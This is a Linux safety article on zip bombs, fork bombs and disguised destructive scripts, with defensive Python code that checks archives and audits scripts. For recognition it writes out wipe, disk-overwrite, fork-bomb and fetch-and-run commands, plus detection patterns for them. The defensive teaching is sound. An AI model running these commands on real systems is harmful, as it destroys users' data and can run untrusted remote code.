How to Prevent Virus-like Behavior Under Linux

If a Linux machine is behaving unpredictably, the cause is more than likely a configuration or hardware problem rather than malware. Some graphics adapters render incorrectly until their proprietary driver is installed, and lost data is far more often the result of a file system error or an unclean shutdown than of an attack. It is still tempting to blame a virus, so rule out the mundane explanations first.

Virus is a term many people apply loosely to malware of every kind. True self-replicating viruses are exceptionally rare on Linux. GNU/Linux is not the dominant consumer desktop, so relatively few threats target Linux home users; servers are far more attractive, and Android, which runs on the Linux kernel, has its own malware ecosystem. Most real Linux compromises come through an exploited vulnerability, a misconfiguration, or a user tricked into running something destructive, not through a classic viral infection, so rule out the other explanations before panicking. Keep the hints below in mind and you will avoid most of the self-inflicted damage they describe. The commands discussed here are destructive and are shown only so that you can recognise them; do not run them. The screenshots for this article were taken in a virtual machine, so no real file system was harmed.

Method 1: Preventing Zip Bombs

Zip bombs are a problem because they affect every platform equally. They don't exploit the operating system; they exploit the way archivers and the compression format itself work. A zip bomb built to harm MS-DOS machines in the 1980s would still cause exactly the same problem on an Android smartphone ten years from now.

Take the infamous 42.zip for example. It is traditionally called 42.zip because the archive itself is about 42 kilobytes, but a prankster could name it anything. It holds five layers of nested archives organised in sets of 16, and each bottom-level archive contains a file of roughly 3.99 binary gigabytes consisting entirely of null (zero) bytes, the same data you get by reading /dev/zero on Linux. (Don't confuse this with /dev/null, which produces no data at all when read.) Because every byte is identical, the data compresses to almost nothing, which is what makes the archive so small.

Decompressed in full, that comes to roughly 3.99 binary petabytes, enough to fill even a large RAID array. The usual victims are not people who double-click the file but systems that unpack archives automatically, such as mail gateways and antivirus scanners that recurse into nested archives. Never decompress an archive you're unsure about, and check its declared uncompressed size and compression ratio before extracting anything.

If it does happen to you, remember that the data itself isn't harmful; the exploit simply relies on the fact that most file systems and RAM configurations can't hold that much data at once. Often you can recover without rebooting by killing the archiver and deleting the partially extracted files. If the system is wedged, boot from a Linux live CD, microSDHC card or USB stick, delete the extracted null-filled files, then reboot into your main installation.
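To make that pre-extraction check concrete, here is an added example (not code from the original article) that reads only a zip file's central directory with Python's standard-library zipfile module and refuses archives whose declared size, compression ratio or nested archives look like a bomb. The thresholds and the two sample archives are constructed for the demo; tune the limits to your own environment.

```python
"""Triage a zip archive for zip-bomb characteristics without extracting it.

Added example, not code from the original article. Only the central
directory is read (via the standard-library zipfile module), so nothing is
inflated to disk. Thresholds and sample archives are constructed for the demo.
"""
import io
import zipfile

# Illustrative limits (assumptions; tune them for your environment).
MAX_TOTAL_UNCOMPRESSED = 1 << 30   # refuse anything declaring more than 1 GiB
MAX_RATIO = 100                    # uncompressed:compressed above this is suspect
NESTED_SUFFIXES = (".zip", ".jar", ".7z", ".rar", ".gz", ".tar", ".bz2", ".xz")


def inspect_zip(data: bytes) -> dict:
    """Summarise declared sizes, compression ratio and nested archives.

    Caveat: the sizes come from headers the archive author controls, so a
    hostile archive can understate them. Treat a clean report as 'not
    obviously a bomb' and still enforce a hard byte cap while extracting.
    """
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        infos = zf.infolist()
    total_unc = sum(i.file_size for i in infos)
    total_comp = sum(i.compress_size for i in infos)
    nested = [i.filename for i in infos
              if i.filename.lower().endswith(NESTED_SUFFIXES)]
    ratio = total_unc / total_comp if total_comp else float("inf")

    reasons = []
    if total_unc > MAX_TOTAL_UNCOMPRESSED:
        reasons.append(f"declares {total_unc} bytes, limit {MAX_TOTAL_UNCOMPRESSED}")
    if ratio > MAX_RATIO:
        reasons.append(f"compression ratio {ratio:.0f}:1 exceeds {MAX_RATIO}:1")
    if nested:
        reasons.append(f"contains nested archive(s): {nested}")
    return {
        "entries": len(infos),
        "uncompressed": total_unc,
        "compressed": total_comp,
        "ratio": ratio,
        "nested": nested,
        "suspicious": bool(reasons),
        "reasons": reasons,
    }


def make_bomb_like_zip(size_bytes: int = 16 << 20) -> bytes:
    """Constructed sample: a run of zero bytes (DEFLATE packs these ~1000:1)
    plus a second zip nested inside, the two hallmarks of a 42.zip-style bomb."""
    inner = io.BytesIO()
    with zipfile.ZipFile(inner, "w", zipfile.ZIP_DEFLATED) as izf:
        izf.writestr("more_zeros.bin", b"\x00" * (1 << 20))
    outer = io.BytesIO()
    with zipfile.ZipFile(outer, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("zeros.bin", b"\x00" * size_bytes)
        zf.writestr("layer.zip", inner.getvalue())
    return outer.getvalue()


def make_benign_zip() -> bytes:
    """Constructed sample: ordinary text, modest ratio, no nesting."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("notes.txt", b"Quarterly report draft, nothing to see here.\n" * 20)
    return buf.getvalue()


if __name__ == "__main__":
    for name, blob in (("benign", make_benign_zip()), ("bomb-like", make_bomb_like_zip())):
        report = inspect_zip(blob)
        verdict = "REFUSE" if report["suspicious"] else "ok"
        print(f"{name}: {verdict} ({len(blob)} bytes on disk, "
              f"{report['uncompressed']} declared, ratio {report['ratio']:.0f}:1)")
        for reason in report["reasons"]:
            print("  -", reason)
```

The same numbers are what unzip -l or zipinfo show interactively; the point of scripting it is that a gateway or cron job can refuse an archive before any bytes are inflated. Because the declared sizes are attacker-controlled, pair this with a byte counter that aborts extraction once a hard cap is exceeded.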

Method 2: Command Trick Exploits

Never run a Bash, tcsh or other shell command if you're not sure exactly what it does. Some people try to trick new Linux users into running something that harms their system, and even experienced users get caught by cleverly disguised commands. The most common example is the fork bomb: a shell function that calls itself, piping one call into another and backgrounding the result, so every new process spawns two more until the process table fills and the system has to be restarted.

If someone asks you to run something absurd like :(){ :|:& };:, they're insulting you and trying to get you to crash your machine. It defines a function named : whose body pipes a call of itself into another call of itself and backgrounds it, then invokes the function. If you have seen Bash reject it with a syntax error, that is usually because it was typed without spaces around the braces (the shell then reads {: as a single word), not because the shell recognised it as dangerous; written correctly it runs. The real protection is a per-user process limit: some distributions ship one by default, and you can set one for a session with ulimit -u or permanently through pam_limits in /etc/security/limits.conf. With the limit in place the bomb hits the cap and the shell reports that it cannot fork, rather than taking the whole machine down.


There is reportedly at least one test build of FreeBSD that insults any user who tries this while refusing to let it harm the system. Don't try it just to see what happens, though.


Method 3: Examining Unusual Scripts

Any time you receive a Python, Perl, Bash, Dash, tcsh or other script, read it before you run it. Harmful commands may be hidden inside, and one common disguise is a string of hex-escaped bytes, for instance:

"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"

"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"

Strings like these mean nothing to a human reader, which is exactly the point: the script decodes them at run time and hands the result to the shell, or executes them as raw machine code. Note that these particular bytes do not decode to readable text (the exceptionally destructive rm -rf / written as plain hex escapes is \x72\x6d\x20\x2d\x72\x66\x20\x2f), so the script must transform or execute them further, and either way you cannot tell what they do by looking. Decode any such string yourself before running the script. Run unread, a script like this could wipe your entire installation and, on machines where the EFI variables are mounted writable, damage the firmware boot configuration as well. One caveat: current GNU rm refuses rm -rf / unless --no-preserve-root is given, so destructive scripts more often use rm -rf /* or target your home directory instead.

Also look for commands that appear innocuous but are destructive. You may know that the > symbol redirects a command's output into a file (it is | that pipes output into another command). Anything redirecting into /dev/sda, /dev/sdb or any other block device node writes straight over the raw disk, destroying the partition table and every file system on it, with no confirmation. You don't want to do that.

Another one you’ll very often see is a command that’s something like this:

mv /bin/* /dev/null

The /dev/null device file is nothing more than a bit bucket: bytes written to it vanish. The prankster's intent is to make the contents of /bin disappear, and since that needs root, a common variant is mv ~/* /dev/null, aimed at your home directory instead. Neither command does quite what the prankster expects, which is why you will see an error message on any distribution: mv refuses to move multiple sources into a destination that is not a directory. Run as root with a single source file, however, mv renames that file over the /dev/null device node, destroying the device and breaking every program that writes to it, so treat the command as hostile regardless. The variants that really do destroy data in one stroke use redirection or rm rather than mv.

Pay close attention to anything that invokes dd, or mkfs.ext3, mkfs.ext4, mkfs.vfat or any other mkfs variant, with a device under /dev as its target. mkfs writes a new, empty file system over whatever is there, and dd with of= pointing at a disk copies raw bytes straight over it; both look like routine administration and neither asks for confirmation.
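Reading a script by eye is still the main defence, but the patterns above are regular enough to triage automatically. The following added example (not code from the original article) decodes \xNN escapes so hidden commands become readable, then matches each line against an illustrative, assumed-not-exhaustive list of the destructive idioms discussed in this section. Both sample scripts are constructed for the demo.

```python
"""Static triage of a downloaded script before running it.

Added example, not code from the original article. It decodes \\xNN escapes
so obfuscated commands become readable, then matches an illustrative (assumed,
not exhaustive) list of destructive shell idioms. Sample scripts are constructed.
"""
import re

HEX_ESCAPE = re.compile(r"\\x([0-9a-fA-F]{2})")
BLOCK_DEV = r"/dev/(?:sd|hd|vd|xvd|nvme|mmcblk)"
MIN_HEX_RUN = 8  # assumed threshold: this many escapes on one line deserves a look

# (label, regex) pairs applied to each line after hex-decoding it.
DANGER_PATTERNS = [
    ("rm against / or the home directory",
     re.compile(r"\brm\s+(?:-\S+\s+)*(?:/\*?|~/?\*?|\$HOME/?\*?)(?=[\s;'\"|&]|$)")),
    ("rm with --no-preserve-root", re.compile(r"--no-preserve-root\b")),
    ("redirect into a block device", re.compile(r">\s*" + BLOCK_DEV)),
    ("dd writing to a block device", re.compile(r"\bdd\b[^\n]*\bof=" + BLOCK_DEV)),
    ("mkfs on a device", re.compile(r"\bmkfs(?:\.\w+)?\s+(?:-\S+\s+)*/dev/")),
    ("mv into /dev/null", re.compile(r"\bmv\s+\S+.*\s/dev/null(?=[\s;]|$)")),
    ("fork bomb", re.compile(r":\(\)\s*\{\s*:\s*\|\s*:\s*&\s*\}")),
    ("downloaded or decoded data piped into a shell",
     re.compile(r"\b(?:curl|wget|base64\s+(?:-d|--decode))\b[^\n|]*\|\s*(?:sudo\s+)?(?:ba|z|da|k)?sh\b")),
]


def unescape_hex(text: str) -> str:
    """Turn \\x72\\x6d into 'rm' so an obfuscated command can be pattern-matched."""
    return HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), text)


def audit(script: str) -> list:
    """Return findings as dicts: line number, label, and the decoded line text."""
    findings = []
    for n, raw in enumerate(script.splitlines(), 1):
        # A long run of escapes is suspicious on its own, whatever it decodes to.
        if len(HEX_ESCAPE.findall(raw)) >= MIN_HEX_RUN:
            findings.append({"line": n, "label": "long run of hex escapes", "text": raw.strip()})
        decoded = unescape_hex(raw)
        for label, pat in DANGER_PATTERNS:
            if pat.search(decoded):
                findings.append({"line": n, "label": label, "text": decoded.strip()})
    return findings


# Constructed sample: an "installer" hiding every idiom discussed in the article.
SAMPLE_SCRIPT = r"""#!/bin/bash
# helper installer (constructed for this example)
set -e
echo "Installing helper tools..."
PAYLOAD=$'\x72\x6d\x20\x2d\x72\x66\x20\x2f\x2a'
eval "$PAYLOAD"
cat /dev/zero > /dev/sda
dd if=/dev/urandom of=/dev/sdb bs=1M
mkfs.vfat /dev/sdc1
mv ~/* /dev/null
:(){ :|:& };:
curl -s http://example.invalid/setup.sh | sh
"""

# Constructed sample: an ordinary installer that legitimately uses rm -rf on a temp dir.
BENIGN_SCRIPT = r"""#!/bin/bash
set -euo pipefail
TMP=$(mktemp -d)
tar -xzf app.tar.gz -C "$TMP"
install -m 0755 "$TMP/app" /usr/local/bin/app
rm -rf "$TMP"
"""

if __name__ == "__main__":
    for name, text in (("sample", SAMPLE_SCRIPT), ("benign", BENIGN_SCRIPT)):
        hits = audit(text)
        print(f"{name}: {len(hits)} finding(s)")
        for h in hits:
            print(f"  line {h['line']:>2}: {h['label']}  <-  {h['text']}")
```

The decode step is what makes this worth scripting: the PAYLOAD line looks like noise to a reader, but once unescaped it is plainly rm -rf /*. A clean result from a list like this proves nothing (an attacker can split strings or use other encodings), so treat it as a first pass that tells you where to read most carefully, never as permission to run the file.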

Once again, never run any of these commands on a live file system. We're only telling you what to look out for, and we don't want anyone to toast their data. Be cautious and make sure you know what a script does before you run anything from an outside source.

Kevin Arrows
Kevin is a dynamic and self-motivated information technology professional with a thorough knowledge of all facets of network infrastructure design, implementation and administration, and a superior record of delivering simultaneous large-scale mission-critical projects on time and under budget.
